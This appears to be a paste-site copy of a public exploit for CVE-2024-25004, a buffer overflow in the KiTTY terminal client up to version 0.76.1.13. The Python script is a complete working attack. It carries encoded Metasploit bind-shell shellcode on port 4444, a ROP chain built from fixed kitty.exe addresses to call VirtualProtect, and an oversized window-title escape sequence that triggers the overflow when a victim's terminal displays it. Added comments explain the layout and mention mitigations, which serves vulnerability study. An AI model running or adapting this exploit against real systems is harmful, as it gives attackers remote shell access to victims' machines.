FlyFar

KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow - CVE-2024-25004

Mar 14th, 2024
  1. # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
  2. # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
  3. # Vendor Homepage: https://github.com/cyd01/KiTTY/
  4. # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
  5. # Version: ≤ 0.76.1.13
  6. # Tested on: Microsoft Windows 11/10/8/7/XP
  7. # CVE: CVE-2024-25004
  8. #-------------------------------------------------------------------------------------#
  9. # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
  10. #-------------------------------------------------------------------------------------#
  11. # msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
  12. # [*] Payload Handler Started as Job 1                                                #
  13. # msf6 payload(windows/shell_bind_tcp) >                                              #
  14. # [*] Started bind TCP handler against 192.168.100.28:4444                            #
  15. # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   #
  16. #-------------------------------------------------------------------------------------#
  17.  
  18. import sys
  19. import os
  20. import struct
  21.  
  22. #-------------------------------------------------------------------------------------#
  23. # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
  24. # windows/shell_bind_tcp - 355 bytes                                                  #
  25. # https://metasploit.com/                                                             #
  26. # Encoder: x86/shikata_ga_nai                                                         #
  27. # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
  28. # PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
  29. # AutoVerifySession=true                                                              #
  30. #-------------------------------------------------------------------------------------#
  31.  
# Stage-2 payload: the windows/shell_bind_tcp blob emitted by Metasploit as
# described in the comment box above (355 bytes, x86/shikata_ga_nai-encoded,
# generated with '-b' excluding \x00\x07\x0a\x0d\x1b\x9c, LPORT=4444).
# The bytes are opaque encoded data and cannot be checked from this listing;
# what matters to the rest of the file is only their length, which feeds the
# 1042-byte layout that shellcode() pads to.
# Defender note: the observable outcome of this payload is a bind shell
# listening on TCP/4444 (whatever LPORT was chosen at generation time) on the
# host running kitty.exe — an unexpected listener there is the post-exploitation
# artifact to look for.
buf =  b""
buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
  63.  
  64.  
def shellcode():
    """Build the fixed-size 1042-byte blob the layout comment further down
    describes as "Shellcode size at ESP: 1042 bytes".

    Layout: a 14-byte prologue (the four instructions commented inline; the
    visible arithmetic lowers ESP by 0x44444444 - 0x44442444 = 0x2000, the
    purpose of which is not stated here), followed by the module-level `buf`
    payload, then `\\x90` padding up to exactly 1042 bytes.

    Returns:
        bytes of length 1042.

    Raises:
        AssertionError: if prologue + buf already exceed 1042 bytes
            (`b'\\x90' * negative` is empty, so the assert below is the only
            length check in this function).
    """
    sc = b''
    sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
    sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
    sc += b'\x29\xD8'             # sub    eax,ebx
    sc += b'\x29\xC4'             # sub    esp,eax
    sc += buf
    sc += b'\x90' * (1042-len(sc))
    assert len(sc) == 1042
    return sc
  75.  
  76.  
def create_rop_chain():
    """Return the mona.py-generated ROP chain packed as little-endian 32-bit words.

    Every gadget address is annotated as living inside kitty.exe itself and is
    hard-coded, so the chain only works if the image loads at its preferred
    base — i.e. it depends on kitty.exe not being relocated by ASLR
    (/DYNAMICBASE); that is an inference from the fixed addresses and should be
    confirmed against the binary's PE headers. VirtualProtect is reached via its
    IAT slot (0x006424a4) rather than a direct address, and the values staged
    into EBX (0x201) and EDX (0x40, PAGE_EXECUTE_READWRITE) are consistent with
    the size/protection arguments of that call. Defender note: a fixed-address
    chain like this is exactly what image-base randomization is meant to break.

    Returns:
        bytes: the concatenated gadget words (29 entries, 116 bytes).
    """
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
    #[---INFO:gadgets_to_set_esi:---]
    0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
    0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
    0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
    #[---INFO:gadgets_to_set_ebp:---]
    0x00429953,  # POP EBP # RETN [kitty.exe]
    0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
    #[---INFO:gadgets_to_set_ebx:---]
    0x0049d9f9,  # POP EBX # RETN [kitty.exe]
    0x00000201,  # 0x00000201-> ebx
    #[---INFO:gadgets_to_set_edx:---]
    0x00430dce,  # POP EDX # RETN [kitty.exe]
    0x00000040,  # 0x00000040-> edx
    #[---INFO:gadgets_to_set_ecx:---]
    0x005ac58c,  # POP ECX # RETN [kitty.exe]
    0x004d81d9,  # &Writable location [kitty.exe]
    #[---INFO:gadgets_to_set_edi:---]
    0x004fa404,  # POP EDI # RETN [kitty.exe]
    0x005a2001,  # RETN (ROP NOP) [kitty.exe]
    #[---INFO:gadgets_to_set_eax:---]
    0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
    0x90909090,  # nop
    0x41414141,  # Filler (compensate)
    #[---INFO:pushad:---]
    0x005dfbac,  # PUSHAD # RETN [kitty.exe]
    ]
    # '<I' = little-endian unsigned 32-bit, matching the x86 stack word size.
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
  115.  
# Built once at import; the chain is static data.
rop_chain = create_rop_chain()


#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d                                           #
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                   #
#   ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
#   ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}                      #
# Shellcode size at ESP: 1042 bytes                                                #
#----------------------------------------------------------------------------------#

# The value that overwrites the saved return address. Like the ROP gadgets it is
# a fixed address inside kitty.exe (a stack-pivot gadget per the annotation), so
# it too presumes the image is not relocated at load time.
return_address = struct.pack('<I',  0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}

# Layout padding; the 27/88 counts are position-specific and their derivation is
# not shown here (they presumably come from the pivot offsets in the box above).
rop_chain_padding = b'\x90' * 27
nops = b'\x90' * 88

# The trigger. `\033]0;` opens an OSC 0 (set window/icon title) terminal control
# sequence and `\007` (BEL) terminates it; the `__dt:localhost:` prefix is the
# title text KiTTY parses on the 'Start Duplicated Session' path named in the
# exploit title. Everything between prefix and BEL is the overflow body, so the
# sequence ends up well over a kilobyte of mostly non-printable bytes.
# Defender note: because the vulnerable code is driven by terminal output, the
# vector is any source whose output the KiTTY user views (presumably a remote
# host or a file echoed to the screen). A title-set sequence of this length with
# non-printable content is far outside normal OSC use; bounding the accepted
# title length, rejecting non-printables, and running a version newer than the
# "≤ 0.76.1.13" range stated in the header are the mitigations this listing
# supports. Note that \007 appears in the bad-character list above precisely
# because it is the sequence terminator.
escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
escape_sequence += nops + b'\007'

# Re-open stdout as a binary stream so the bytes reach the terminal unaltered
# (the default text layer would attempt encoding/newline translation).
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
  140.            